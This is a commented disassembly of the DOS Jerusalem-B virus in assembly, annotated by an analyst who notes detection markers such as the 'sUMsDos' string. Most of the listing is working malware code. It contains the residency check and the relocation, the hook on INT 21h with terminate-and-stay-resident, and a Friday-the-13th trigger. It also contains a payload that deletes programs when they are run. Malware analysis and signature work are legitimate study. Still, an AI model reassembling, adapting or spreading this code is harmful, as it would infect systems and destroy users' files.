Assembly Source File
|
1994-07-17
|
17KB
|
723 lines
PAGE 59,132
;*****************************************************************************
; Jerusalem Virus - Strain B
;
; Disassembled and commented by:
;
; - Captain Morgan -
;*****************************************************************************
; CPU directive followed by the absolute offsets that the disassembler turned
; into symbols. The data_NNe names are auto-generated and carry no meaning of
; their own; the notes below record only what the code visible in this listing
; does with each offset. Symbols without a note are not referenced in the part
; of the listing shown here.
.286c
data_1e equ 2Ch ; read through the segment held in data_34e; the result is used as a segment and scanned for a double NUL. NOTE(review): consistent with the PSP environment-segment field - confirm
data_2e equ 43h
data_3e equ 45h
data_4e equ 47h
data_5e equ 49h
data_6e equ 51h
data_7e equ 53h
data_8e equ 57h
data_9e equ 5Dh
data_10e equ 5Fh
data_11e equ 61h
data_12e equ 63h
data_13e equ 65h
data_14e equ 78h
data_15e equ 7Ah ; same value as data_41e below
data_16e equ 7Ch
data_17e equ 7Eh
data_18e equ 0Ah ; offset half of the far pointer jumped through at loc_10 (set to 100h there)
data_19e equ 0Ch ; segment half of that far pointer (popped from the stack at loc_10)
data_20e equ 0Eh ; byte flag: cleared, then incremented when DOS reports weekday 5 and day 13; tested at loc_15
data_21e equ 0Fh ; word loaded into AX just before the far jump at loc_10
data_22e equ 11h
data_23e equ 13h ; saved INT 08h vector, offset (from AX=3508h)
data_24e equ 15h ; saved INT 08h vector, segment
data_25e equ 17h ; saved INT 21h vector, offset (from AX=3521h); target of the call/jmp dword chains
data_26e equ 19h ; saved INT 21h vector, segment
data_27e equ 1Bh
data_28e equ 1Dh
data_29e equ 1Fh ; word set to 7E90h at the point where INT 08h is hooked
data_30e equ 29h
data_31e equ 2Bh
data_32e equ 2Dh ; byte count for the final rep movsb at loc_13
data_33e equ 2Fh ; loop count for the 8000h-word copies at loc_12
data_34e equ 31h ; segment loaded into ES for the AH=4Ah resize and for reaching data_1e
data_35e equ 33h ; paragraph count computed from SP (SP shr 4, plus 10h)
data_36e equ 4Eh
data_37e equ 70h
data_38e equ 72h
data_39e equ 74h
data_40e equ 76h
data_41e equ 7Ah ; word used as both multiplier and divisor at loc_11; duplicates data_15e
data_42e equ 80h
data_43e equ 82h
data_44e equ 8Fh
seg_a segment
assume cs:seg_a, ds:seg_a
org 100h
; je -- program entry at offset 100h (the segment is assembled with org 100h).
; Flow visible here: jump over an embedded data area, probe INT 21h with a
; non-standard function number, then re-base the segment by 10h paragraphs and
; continue in the bytes that follow the retf.
; Analyst notes:
;  - The db runs in this proc mix data with instructions the disassembler did
;    not decode, so the proc/endp boundaries do not follow the real control flow.
;  - The data area holds byte patterns usable for identification (see below).
je proc far
start:
jmp loc_2 ; (0195)
; Data area skipped by the jump above. The first seven bytes
; (73h,55h,4Dh,73h,44h,6Fh,73h) are ASCII "sUMsDos", a string commonly cited
; as an identification marker for this family.
db 73h, 55h, 4Dh, 73h, 44h, 6Fh
db 73h, 0, 1, 0EBh, 21h, 0
db 0, 0, 0ABh, 0Bh, 2Ch, 2
db 70h, 0, 92h, 0Eh, 29h, 1Ah
db 0EBh, 4, 59h, 6Fh, 0A8h
db 7Bh
db 13 dup (0)
db 0E8h, 6, 0D7h, 62h, 21h, 80h
db 0, 0, 0, 80h, 0, 62h
db 21h, 5Ch, 0, 62h, 21h, 6Ch
db 0, 62h, 21h, 10h, 7, 60h
db 5Bh, 0C5h, 0, 60h, 5Bh, 0
; 4Dh,5Ah below is ASCII "MZ", the DOS EXE header signature.
; NOTE(review): presumably an EXE-header work buffer - confirm.
db 0F0h, 6, 0, 4Dh, 5Ah, 30h
db 0, 53h, 0, 1Fh, 0, 20h
db 0, 0, 0, 0FFh, 0FFh, 0B2h
db 9, 10h, 7, 84h, 19h, 0C5h
db 0, 0B2h, 9, 20h, 0, 0
db 0, 2Eh, 0Dh, 0Ah, 0, 0
db 5, 0, 20h, 0, 26h, 12h
db 46h, 0A3h, 0, 2, 10h, 0
db 20h, 9Dh, 0, 0, 7Bh, 3Dh
db 2Eh, 9Bh
; Literal file name; the code that uses it is not visible in this proc.
db 'COMMAND.COM'
db 1, 0, 0, 0, 0, 0
loc_2:
cld ; Clear direction
; Probe: AH=E0h is outside the standard DOS function range, so the value that
; comes back in AH shows whether something else is answering it.
mov ah,0E0h
int 21h ; DOS Services ah=function E0h
cmp ah,0E0h
jae loc_3 ; Jump if above or = (AH came back >= E0h)
cmp ah,3
jb loc_3 ; Jump if below (AH came back < 3)
; Reached only when 3 <= AH < E0h. The undecoded bytes after loc_8 later in the
; listing (80h,0FCh,0E0h ... 0B8h,0,3) read as "cmp ah,0E0h / mov ax,300h", so
; AH=3 presumably means a resident copy replied - confirm.
mov ah,0DDh
mov di,100h
mov si,710h
add si,di ; SI = 810h
mov cx,cs:[di+11h] ; word at cs:0111h, inside the data area above
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function DDh
loc_3:
; Re-base: SS = CS+10h paragraphs, SP = 700h.
mov ax,cs
add ax,10h
mov ss,ax
mov sp,700h
loc_4:
; Far return to (CS+10h):00C5h. CS+10h paragraphs is CS:0100h, so the target is
; CS:01C5h, the byte directly after this retf; from there on, offsets are
; counted from the start of the image rather than from 100h.
push ax
mov ax,0C5h
push ax
retf ; Return far
; Undecoded instructions reached by the retf above (the run opens with
; 0FCh = cld, 06h = push es). It repeats the AH=E0h probe (0B4h,0E0h,0CDh,21h).
db 0FCh, 6, 2Eh, 8Ch, 6, 31h
db 0, 2Eh, 8Ch, 6, 39h, 0
db 2Eh, 8Ch, 6, 3Dh, 0, 2Eh
db 8Ch, 6, 41h, 0, 8Ch, 0C0h
db 5, 10h, 0, 2Eh, 1, 6
db 49h, 0, 2Eh, 1, 6, 45h
db 0, 0B4h, 0E0h, 0CDh, 21h, 80h
db 0FCh, 0E0h, 73h, 13h, 80h, 0FCh
db 3, 7, 2Eh, 8Eh, 16h, 45h
db 0, 2Eh, 8Bh, 26h, 43h, 0
db 2Eh, 0FFh, 2Eh, 47h, 0, 33h
db 0C0h, 8Eh, 0C0h, 26h, 0A1h, 0FCh
db 3, 2Eh, 0A3h, 4Bh, 0, 26h
db 0A0h, 0FEh, 3, 2Eh, 0A2h, 4Dh
db 0
; 26h is the ES segment-override prefix; the instruction it belongs to is the
; first one of the next proc, so the endp below splits an instruction.
db 26h
je endp
;██████████████████████████████████████████████████████████████████████████
;
; External Entry Point
;
;██████████████████████████████████████████████████████████████████████████
; int_24h_entry -- name and "External Entry Point" banner come from the
; disassembler; nothing visible in this proc references INT 24h, and execution
; falls into it from the bytes at the end of the previous proc.
; What the visible code does: plants a three-byte copy stub at 0000:03FCh (the
; last slot of the interrupt vector table), uses it to copy 710h bytes of this
; segment to a segment 10h paragraphs above a value popped from the stack, and
; resumes at offset 142h of the copy.
; Analyst note: a transient write to 0000:03FCh-03FEh is a behavioural
; indicator of this routine.
int_24h_entry proc far
; The 26h byte that ends the previous proc is an ES override for this
; instruction, so the effective target is presumably ES:[3FCh] with ES=0
; (set by 33h,0C0h,8Eh,0C0h in the preceding bytes) - confirm.
; 0A5F3h is stored as F3h,A5h = "rep movsw".
mov word ptr ds:[3FCh],0A5F3h
; 0CBh = "retf". NOTE(review): data_47 is a label the disassembler attached to
; a byte later in this listing; with ES=0 the write more likely lands on the
; absolute address right after the two bytes stored above - confirm.
mov byte ptr es:data_47,0CBh
pop ax
add ax,10h
mov es,ax ; destination segment = popped value + 10h
push cs
pop ds ; source segment = this code segment
mov cx,710h
shr cx,1 ; Shift w/zeros fill (710h bytes -> 388h words)
xor si,si ; Zero register
mov di,si ; DS:0000 -> ES:0000
; Return address consumed by the stub's retf: ES:0142h.
push es
mov ax,142h
push ax
;* jmp far ptr loc_1 ;*(0000:03FC)
; Hand-encoded far jump (0EAh, offset 03FCh, segment 0000h) into the stub.
db 0EAh, 0FCh, 3, 0, 0
; Undecoded instructions that follow the jump. They appear to reset SS:SP to
; CS:0700h and write the bytes saved at cs:[4Bh]/cs:[4Dh] back to
; 0000:03FCh/03FEh, i.e. undo the stub - confirm.
db 8Ch, 0C8h, 8Eh, 0D0h, 0BCh, 0
db 7, 33h, 0C0h, 8Eh, 0D8h, 2Eh
db 0A1h, 4Bh, 0, 0A3h, 0FCh, 3
db 2Eh, 0A0h, 4Dh, 0, 0A2h, 0FEh
db 3
int_24h_entry endp
;██████████████████████████████████████████████████████████████████████████
;
; External Entry Point
;
;██████████████████████████████████████████████████████████████████████████
int_21h_entry proc far
mov bx,sp
mov cl,4
shr bx,cl ; Shift w/zeros fill
add bx,10h
mov cs:data_35e,bx
mov ah,4Ah ; 'J'
mov es,cs:data_34e
int 21h ; DOS Services ah=function 4Ah
; change mem allocation, bx=siz
mov ax,3521h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov cs:data_25e,bx
mov cs:data_26e,es
push cs
pop ds
mov dx,25Bh
mov ax,2521h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov es,ds:data_34e
mov es,es:data_1e
xor di,di ; Zero register
mov cx,7FFFh
xor al,al ; Zero register
locloop_5:
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
cmp es:[di],al
loopnz locloop_5 ; Loop if zf=0, cx>0
mov dx,di
add dx,3
mov ax,4B00h
push es
pop ds
push cs
pop es
mov bx,35h
push ds
push es
push ax
push bx
push cx
push dx
mov ah,2Ah ; '*'
int 21h ; DOS Services ah=function 2Ah
; get date, cx=year, dx=mon/day
mov byte ptr cs:data_20e,0
cmp cx,7C3h
je loc_7 ; Jump if equal
cmp al,5 ; Check to see if it's Friday
jne loc_6 ; Jump if not equal
cmp dl,0Dh ; Check to see if it's the 13th
jne loc_6 ; Jump if not equal
inc byte ptr cs:data_20e
jmp short loc_7 ; (02F7)
db 90h
loc_6:
mov ax,3508h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov cs:data_23e,bx
mov cs:data_24e,es
push cs
pop ds
mov word ptr ds:data_29e,7E90h
mov ax,2508h
mov dx,21Eh
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
loc_7:
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
pushf ; Push flags
call dword ptr cs:data_25e
push ds
pop es
mov ah,49h ; 'I'
int 21h ; DOS Services ah=function 49h
; release memory block, es=seg
mov ah,4Dh ; 'M'
int 21h ; DOS Services ah=function 4Dh
; get return code info in ax
mov ah,31h ; '1'
mov dx,600h
mov cl,4
shr dx,cl ; Shift w/zeros fill
add dx,10h
int 21h ; DOS Services ah=function 31h
; terminate & stay resident
db 32h, 0C0h, 0CFh, 2Eh, 83h, 3Eh
db 1Fh, 0, 2, 75h, 17h, 50h
db 53h, 51h, 52h, 55h, 0B8h, 2
db 6, 0B7h, 87h, 0B9h, 5, 5
db 0BAh, 10h, 10h, 0CDh, 10h, 5Dh
db 5Ah, 59h, 5Bh, 58h, 2Eh, 0FFh
db 0Eh, 1Fh, 0, 75h, 12h, 2Eh
db 0C7h, 6, 1Fh, 0, 1, 0
db 50h, 51h, 56h, 0B9h, 1, 40h
db 0F3h, 0ACh
db 5Eh, 59h, 58h
loc_8:
jmp dword ptr cs:data_23e
db 9Ch, 80h, 0FCh, 0E0h, 75h, 5
db 0B8h, 0, 3, 9Dh, 0CFh, 80h
db 0FCh, 0DDh, 74h, 13h, 80h, 0FCh
db 0DEh, 74h, 28h, 3Dh, 0, 4Bh
db 75h, 3, 0E9h, 0B4h, 0
loc_9:
popf ; Pop flags
jmp dword ptr cs:data_25e
loc_10:
pop ax
pop ax
mov ax,100h
mov cs:data_18e,ax
pop ax
mov cs:data_19e,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
popf ; Pop flags
mov ax,cs:data_21e
jmp dword ptr cs:data_18e
loc_11:
add sp,6
popf ; Pop flags
mov ax,cs
mov ss,ax
mov sp,710h
push es
push es
xor di,di ; Zero register
push cs
pop es
mov cx,10h
mov si,bx
mov di,21h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ax,ds
mov es,ax
mul word ptr cs:data_41e ; ax = data * ax
add ax,cs:data_31e
adc dx,0
div word ptr cs:data_41e ; ax,dxrem=dx:ax/data
mov ds,ax
mov si,dx
mov di,dx
mov bp,es
mov bx,cs:data_33e
or bx,bx ; Zero ?
jz loc_13 ; Jump if zero
loc_12:
mov cx,8000h
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
add ax,1000h
add bp,1000h
mov ds,ax
mov es,bp
dec bx
jnz loc_12 ; Jump if not zero
loc_13:
mov cx,cs:data_32e
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop ax
push ax
add ax,10h
add cs:data_30e,ax
data_47 db 2Eh
db 1, 6, 25h, 0, 2Eh, 0A1h
db 21h, 0, 1Fh, 7, 2Eh, 8Eh
db 16h, 29h, 0, 2Eh, 8Bh, 26h
db 27h, 0, 2Eh, 0FFh, 2Eh, 23h
db 0
loc_14:
xor cx,cx ; Zero register
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ah,41h ; 'A'
int 21h ; DOS Services ah=function 41h
; delete file, name @ ds:dx
mov ax,4B00h
popf ; Pop flags
jmp dword ptr cs:data_25e
loc_15:
cmp byte ptr cs:data_20e,1
je loc_14 ; Jump if equal